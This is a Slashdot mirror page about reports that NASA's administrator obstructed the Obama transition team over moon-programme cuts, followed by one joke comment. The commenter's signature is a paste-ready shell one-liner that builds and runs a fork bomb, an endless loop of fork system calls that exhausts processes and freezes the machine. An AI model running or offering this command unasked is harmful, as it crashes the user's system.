Slashdot Mirror


Does Obama Have a Problem At NASA?

MarkWhittington writes "Has NASA become a problem for the Obama transition? If one believes a recent story in the Orlando Sentinel, the transition team at NASA, led by former NASA Associate Administrator Lori Garver, is running into some bureaucratic obstruction." Specifically, according to this article NASA Administrator Michael Griffin made calls to aerospace industry executives asking them to stonewall if asked about benefits to be gained by canceling the current US efforts to revisit the moon; we mentioned last month that cutting Aries and Orion is apparently an idea under strong consideration by the Obama transition team.

1 of 479 comments (clear)

  1. Re:I hate to be an ass... by Hal_Porter · · Score: 5, Funny

    He can't do that. Peter Griffin has rockets that could be converted into makeshift missiles and used to bombard Washington.

    Then Griffin would declare the US disbanded, replaced by a Galactic Empire with Griffin as Emperor.

    I say give him the cash to keep him quiet. Better that than we all end up slaving in the Uranium mines on Pluto.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;